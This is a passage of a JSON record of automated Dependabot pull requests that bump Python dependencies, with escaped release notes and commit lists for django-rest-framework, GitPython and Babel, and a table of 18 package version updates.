href=\"https://github.com/Szaroslav\"\u003e\u003ccode\u003e@​Szaroslav\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9382\"\u003eencode/django-rest-framework#9382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTweak README.md links. by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9375\"\u003eencode/django-rest-framework#9375\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Ensure CursorPagination respects nulls in the ordering field\u0026quot; by \u003ca href=\"https://github.com/max-muoto\"\u003e\u003ccode\u003e@​max-muoto\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9381\"\u003eencode/django-rest-framework#9381\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse warnings rather than logging a warning for DecimalField warnings by \u003ca href=\"https://github.com/terencehonles\"\u003e\u003ccode\u003e@​terencehonles\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9367\"\u003eencode/django-rest-framework#9367\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e20240426 docs by \u003ca href=\"https://github.com/peterthomassen\"\u003e\u003ccode\u003e@​peterthomassen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9392\"\u003eencode/django-rest-framework#9392\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCleanup by \u003ca href=\"https://github.com/peterthomassen\"\u003e\u003ccode\u003e@​peterthomassen\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9393\"\u003eencode/django-rest-framework#9393\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003etests: Check urlpatterns after cleanups by \u003ca href=\"https://github.com/stanislavlevin\"\u003e\u003ccode\u003e@​stanislavlevin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9400\"\u003eencode/django-rest-framework#9400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edocs: Correct some evaluation results and a httpie option in Tutorial1 by \u003ca href=\"https://github.com/wkwkhautbois\"\u003e\u003ccode\u003e@​wkwkhautbois\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9421\"\u003eencode/django-rest-framework#9421\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003e__hash__\u003c/code\u003e method for \u003ccode\u003epermissions.OperandHolder\u003c/code\u003e class by \u003ca href=\"https://github.com/vanya909\"\u003e\u003ccode\u003e@​vanya909\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9417\"\u003eencode/django-rest-framework#9417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix potential XSS vulnerability in break_long_headers template filter by \u003ca href=\"https://github.com/ch4n3-yoon\"\u003e\u003ccode\u003e@​ch4n3-yoon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9435\"\u003eencode/django-rest-framework#9435\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eVersion 3.15.2. by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9439\"\u003eencode/django-rest-framework#9439\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/BradWells\"\u003e\u003ccode\u003e@​BradWells\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9131\"\u003eencode/django-rest-framework#9131\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jthevos\"\u003e\u003ccode\u003e@​jthevos\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9340\"\u003eencode/django-rest-framework#9340\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/gogowitsch\"\u003e\u003ccode\u003e@​gogowitsch\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9387\"\u003eencode/django-rest-framework#9387\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Szaroslav\"\u003e\u003ccode\u003e@​Szaroslav\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9382\"\u003eencode/django-rest-framework#9382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/wkwkhautbois\"\u003e\u003ccode\u003e@​wkwkhautbois\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9421\"\u003eencode/django-rest-framework#9421\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ch4n3-yoon\"\u003e\u003ccode\u003e@​ch4n3-yoon\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9435\"\u003eencode/django-rest-framework#9435\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/encode/django-rest-framework/compare/3.15.1...3.15.2\"\u003ehttps://github.com/encode/django-rest-framework/compare/3.15.1...3.15.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eVersion 3.15.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the message to be consistent with the Django `HttpResponseBa… by \u003ca href=\"https://github.com/maycuatroi\"\u003e\u003ccode\u003e@​maycuatroi\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9287\"\u003eencode/django-rest-framework#9287\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003einflection\u003c/code\u003e package truly optional by \u003ca href=\"https://github.com/browniebroke\"\u003e\u003ccode\u003e@​browniebroke\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9303\"\u003eencode/django-rest-framework#9303\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix broken links in release notes for 3.15 by \u003ca href=\"https://github.com/browniebroke\"\u003e\u003ccode\u003e@​browniebroke\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9305\"\u003eencode/django-rest-framework#9305\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTokenAdmin.autocomplete_fields Breaks Some Use Cases, Revert by \u003ca href=\"https://github.com/alexdlaird\"\u003e\u003ccode\u003e@​alexdlaird\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9301\"\u003eencode/django-rest-framework#9301\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd drf-sendables to third-party-packages.md by \u003ca href=\"https://github.com/amikrop\"\u003e\u003ccode\u003e@​amikrop\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9261\"\u003eencode/django-rest-framework#9261\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;feat: Add some changes to ValidationError to support django style vad…\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9326\"\u003eencode/django-rest-framework#9326\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Re-prefetch related objects after updating\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9327\"\u003eencode/django-rest-framework#9327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/8863\"\u003e#8863\u003c/a\u003e by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9330\"\u003eencode/django-rest-framework#9330\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/8009\"\u003e#8009\u003c/a\u003e by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9332\"\u003eencode/django-rest-framework#9332\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9030\"\u003e#9030\u003c/a\u003e by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9333\"\u003eencode/django-rest-framework#9333\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevert \u0026quot;Fix NamespaceVersioning ignoring DEFAULT_VERSION on non-None namespaces\u0026quot; by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9335\"\u003eencode/django-rest-framework#9335\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSearchFilter.get_search_terms\u003c/code\u003e returns list. by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9338\"\u003eencode/django-rest-framework#9338\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eVersion 3.15.1 by \u003ca href=\"https://github.com/tomchristie\"\u003e\u003ccode\u003e@​tomchristie\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9339\"\u003eencode/django-rest-framework#9339\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/maycuatroi\"\u003e\u003ccode\u003e@​maycuatroi\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9287\"\u003eencode/django-rest-framework#9287\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/alexdlaird\"\u003e\u003ccode\u003e@​alexdlaird\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/encode/django-rest-framework/pull/9301\"\u003eencode/django-rest-framework#9301\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/c7a7eae551528b6887614df816c8a26df70272d6\"\u003e\u003ccode\u003ec7a7eae\u003c/code\u003e\u003c/a\u003e Version 3.15.2 (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9439\"\u003e#9439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/3b41f0124194430da957b119712978fa2266b642\"\u003e\u003ccode\u003e3b41f01\u003c/code\u003e\u003c/a\u003e Fix potential XSS vulnerability in break_long_headers template filter (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9435\"\u003e#9435\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/fe92f0dd0d4c587eed000c7de611ddbff241bd6a\"\u003e\u003ccode\u003efe92f0d\u003c/code\u003e\u003c/a\u003e Add \u003ccode\u003e__hash__\u003c/code\u003e method for \u003ccode\u003epermissions.OperandHolder\u003c/code\u003e class (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9417\"\u003e#9417\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/fbdab09c776d5ceef041793a7acd1c9e91695e5d\"\u003e\u003ccode\u003efbdab09\u003c/code\u003e\u003c/a\u003e docs: Correct some evaluation results and a httpie option in Tutorial1 (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9421\"\u003e#9421\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/36d5c0e74f562cbe3055f0d20818bd48d3c32359\"\u003e\u003ccode\u003e36d5c0e\u003c/code\u003e\u003c/a\u003e tests: Check urlpatterns after cleanups (\u003ca href=\"https://redirect.github.com/encode/django-rest-framework/issues/9400\"\u003e#9400\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/9d4ed054bf8acfac6209b7e7f837fc97517affcc\"\u003e\u003ccode\u003e9d4ed05\u003c/code\u003e\u003c/a\u003e Don't use Windows line endings\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/b34bde47d7fff403df4143a35c71975d7c2e7763\"\u003e\u003ccode\u003eb34bde4\u003c/code\u003e\u003c/a\u003e Fix typo in setup.cfg setting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/ab681f2d5e4a9645aa68eabf1ff18e41d0d5f642\"\u003e\u003ccode\u003eab681f2\u003c/code\u003e\u003c/a\u003e Update requirements in docs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/22377241a89c8233b45441b5adde5b858edef371\"\u003e\u003ccode\u003e2237724\u003c/code\u003e\u003c/a\u003e bump pygments (security hygiene)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/encode/django-rest-framework/commit/d58b8da591120abedc94c1b71576cb9afb2d7868\"\u003e\u003ccode\u003ed58b8da\u003c/code\u003e\u003c/a\u003e Update deprecation hints\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/encode/django-rest-framework/compare/3.2.3...3.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `gitpython` from 0.1.7 to 3.1.41\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/gitpython-developers/GitPython/releases\"\u003egitpython's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.41 - fix Windows security issue\u003c/h2\u003e\n\u003cp\u003eThe details about the Windows security issue \u003ca href=\"https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2mqj-m65w-jghx\"\u003ecan be found in this advisory\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eSpecial thanks go to \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e who reported the issue and fixed it in a single stroke, while being responsible for an incredible amount of improvements that he contributed over the last couple of months ❤️.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e__all__\u003c/code\u003e in git.exc by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1719\"\u003egitpython-developers/GitPython#1719\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet submodule update cadence to weekly by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1721\"\u003egitpython-developers/GitPython#1721\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNever modify sys.path by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1720\"\u003egitpython-developers/GitPython#1720\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump git/ext/gitdb from \u003ccode\u003e8ec2390\u003c/code\u003e to \u003ccode\u003eec58b7e\u003c/code\u003e by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1722\"\u003egitpython-developers/GitPython#1722\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRevise comments, docstrings, some messages, and a bit of code by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1725\"\u003egitpython-developers/GitPython#1725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse zero-argument super() by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1726\"\u003egitpython-developers/GitPython#1726\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove obsolete note in _iter_packed_refs by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1727\"\u003egitpython-developers/GitPython#1727\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReorganize test_util and make xfail marks precise by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1729\"\u003egitpython-developers/GitPython#1729\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClarify license and make module top comments more consistent by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1730\"\u003egitpython-developers/GitPython#1730\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate compat.is_\u003c!-- raw HTML omitted --\u003e, rewriting all uses by \u003ca href=\"https://github.com/EliahKagan\"\u003e\u003ccode\u003e@​EliahKagan\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/gitpython-developers/GitPython/pull/1732\"\u003egitpython-developers/Git...\n\n_Description has been truncated_","html_url":"https://github.com/voolitels/fjord/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/voolitels%2Ffjord/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.4.30","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-08-09T17:24:51.000Z","version_change":"1.4.30 → 1.11.0","issue":{"uuid":"2732830726","node_id":"PR_kwDOAsJDQs6i47AG","number":1,"state":"open","title":"Bump the pip group across 1 directory with 18 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-08-09T17:24:51.000Z","updated_at":"2025-08-09T17:24:51.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":18,"packages":[{"name":"babel","old_version":"2.1.1","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"jinja2","old_version":"2.8.0","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"py","old_version":"1.4.30","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"virtualenv","old_version":"12.0.2","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"},{"name":"celery","old_version":"3.1.19","new_version":"5.2.2","repository_url":"https://github.com/celery/celery"},{"name":"certifi","old_version":"2015.9.6.2","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"colander","old_version":"1.0","new_version":"1.7.0","repository_url":"https://github.com/Pylons/colander"},{"name":"cryptography","old_version":"1.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"gevent","old_version":"1.1b5","new_version":"23.9.0","repository_url":"https://github.com/gevent/gevent"},{"name":"gunicorn","old_version":"19.2.1","new_version":"23.0.0","repository_url":"https://github.com/benoitc/gunicorn"},{"name":"idna","old_version":"2.0","new_version":"3.7","repository_url":"https://github.com/kjd/idna"},{"name":"mako","old_version":"1.0.3","new_version":"1.2.2","repository_url":"https://github.com/sqlalchemy/mako"},{"name":"numpy","old_version":"1.10.1","new_version":"1.22.0","repository_url":"https://github.com/numpy/numpy"},{"name":"pymysql","old_version":"0.6.7","new_version":"1.1.1","repository_url":"https://github.com/PyMySQL/PyMySQL"},{"name":"pyopenssl","old_version":"0.15.1","new_version":"17.5.0","repository_url":"https://github.com/pyca/pyopenssl"},{"name":"requests","old_version":"2.8.1","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"webob","old_version":"1.5.1","new_version":"1.8.8","repository_url":"https://github.com/Pylons/webob"},{"name":"pip","old_version":"7.1.2","new_version":"23.3","repository_url":"https://github.com/pypa/pip"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 18 updates in the /requirements directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [babel](https://github.com/python-babel/babel) | `2.1.1` | `2.9.1` |\n| [jinja2](https://github.com/pallets/jinja) | `2.8.0` | `3.1.6` |\n| [py](https://github.com/pytest-dev/py) | `1.4.30` | `1.11.0` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `12.0.2` | `20.26.6` |\n| [celery](https://github.com/celery/celery) | `3.1.19` | `5.2.2` |\n| [certifi](https://github.com/certifi/python-certifi) | `2015.9.6.2` | `2024.7.4` |\n| [colander](https://github.com/Pylons/colander) | `1.0` | `1.7.0` |\n| [cryptography](https://github.com/pyca/cryptography) | `1.1` | `44.0.1` |\n| [gevent](https://github.com/gevent/gevent) | `1.1b5` | `23.9.0` |\n| [gunicorn](https://github.com/benoitc/gunicorn) | `19.2.1` | `23.0.0` |\n| [idna](https://github.com/kjd/idna) | `2.0` | `3.7` |\n| [mako](https://github.com/sqlalchemy/mako) | `1.0.3` | `1.2.2` |\n| [numpy](https://github.com/numpy/numpy) | `1.10.1` | `1.22.0` |\n| [pymysql](https://github.com/PyMySQL/PyMySQL) | `0.6.7` | `1.1.1` |\n| [pyopenssl](https://github.com/pyca/pyopenssl) | `0.15.1` | `17.5.0` |\n| [requests](https://github.com/psf/requests) | `2.8.1` | `2.32.4` |\n| [webob](https://github.com/Pylons/webob) | `1.5.1` | `1.8.8` |\n| [pip](https://github.com/pypa/pip) | `7.1.2` | `23.3` |\n\n\nUpdates `babel` from 2.1.1 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003ch1\u003eUpcoming version support changes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Use CLDR 37 – Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/734\"\u003e#734\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/741\"\u003e#741\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNumbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eVersion 2.8.0\u003c/h2\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Upgrade to CLDR 36.0 - Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/679\"\u003e#679\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Don't even open files with the \u0026quot;ignore\u0026quot; extraction method - \u003ca href=\"https://github.com/sebleblanc\"\u003e\u003ccode\u003e@​sebleblanc\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, \u003ca href=\"https://github.com/miluChen\"\u003e\u003ccode\u003e@​miluChen\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/662\"\u003e#662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Attempt to sort all messages – Mario Frasca (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/651\"\u003e#651\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/606\"\u003e#606\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocs\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... 